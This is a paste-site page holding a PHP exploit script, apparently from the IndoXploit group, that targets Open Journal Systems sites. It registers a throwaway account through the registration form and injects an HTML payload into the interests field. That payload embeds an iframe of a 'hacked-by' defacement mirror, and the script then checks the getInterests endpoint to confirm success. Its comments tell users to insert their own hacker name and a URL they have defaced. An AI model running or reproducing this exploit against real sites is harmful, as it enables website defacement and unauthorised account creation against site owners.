[php] Open Journal System Ajax getInterests

Viewer

copydownloadembedprintName: Open Journal System Ajax getInterests
  1. <?php
  2.  
  3. /**
  4.  * Open Journal System Ajax getInterests
  5.  * Invalid Headers Set for Content Type JSON data
  6.  * 
  7.  * Author: L0c4lh34rtz
  8.  * Team  : IndoXploit
  9.  * 
  10.  * Exploit Script Coded by L0c4lh34rtz - IndoXploit
  11.  */
  12.  
  13. Class OJS_Exploit {
  14.     public  $uri;
  15.        
  16.         // Ganti dengan nama hacker anda
  17.     private $whoami = 'localheartz';
  18.  
  19.  
  20.     private $credentials;
  21.  
  22.     public function __construct() {
  23.         $this->credentials          = (object) $this->credentials;
  24.         $this->credentials->user    = $this->whoami.rand(1, 1337);
  25.         $this->credentials->pass    = "\x69\x6e\x64\x6f\x78\x70\x6c\x6f\x69\x74";
  26.         $this->credentials->email   = $this->credentials->user.'@'.$this->credentials->user.'.id';
  27.     }
  28.  
  29.     public function setPayload() {
  30.         /* Set payload anda. Ganti url yang pernah anda deface */
  31.         $url     = "http://zonehmirrors.org/defaced/2017/09/16/kosmik.id/kosmik.id/";
  32.         $payload = '-0-hacked-by-'.$this->credentials->user.'-"><center><iframe src='.$url.' height=620px width=1100px scrolling=no frameborder=0>';
  33.         return $payload;
  34.     }
  35.  
  36.     public function doExploit() {
  37.         $user    = $this->credentials->user;
  38.         $password= $this->credentials->pass;
  39.         $email   = $this->credentials->email;
  40.  
  41.         $payload = $this->setPayload();
  42.  
  43.         $curl    = curl_init();
  44.         $options = [
  45.             CURLOPT_URL             => $this->uri."/index.php/index/user/registerUser",
  46.             CURLOPT_RETURNTRANSFER  => TRUE,
  47.             CURLOPT_POST            => TRUE,
  48.             CURLOPT_POSTFIELDS      => "username=$user&password=$password&password2=$password&firstName=$user&lastName=$user&email=$email&confirmEmail=$email&registerAsAuthor=1&interestsTextOnly=$payload",
  49.             CURLOPT_SSL_VERIFYHOST  => FALSE,
  50.             CURLOPT_SSL_VERIFYPEER  => FALSE
  51.         ];
  52.         curl_setopt_array($curl, $options);
  53.         return curl_exec($curl);
  54.         curl_close($curl);
  55.     }
  56.  
  57.     public function check() {
  58.         $get = @file_get_contents($this->uri."/index.php/index/user/getInterests");
  59.         if(preg_match("/{$this->credentials->user}/i", $get)) {
  60.             echo "[*] Successfully Exploited!\n";
  61.             echo "[*] {$this->uri}/index.php/index/user/getInterests\n\n";
  62.         } else {
  63.             echo "[*] Not Vuln :(\n\n";
  64.         }
  65.     }
  66.  
  67.     public function run() {
  68.         echo "[+] Trying to Exploit {$this->uri}\n (with username {$this->credentials->user} and password {$this->credentials->pass}\n";
  69.         $this->doExploit();
  70.         $this->check();
  71.     }
  72. }
  73.  
  74. $ojs = new OJS_Exploit();
  75. $ojs->uri = $argv[1];
  76. $ojs->run();

Editor

You can edit this paste and save as new:


File Description
  • Open Journal System Ajax getInterests
  • Paste Code
  • 29 May-2021
  • 2.62 Kb
You can Share it: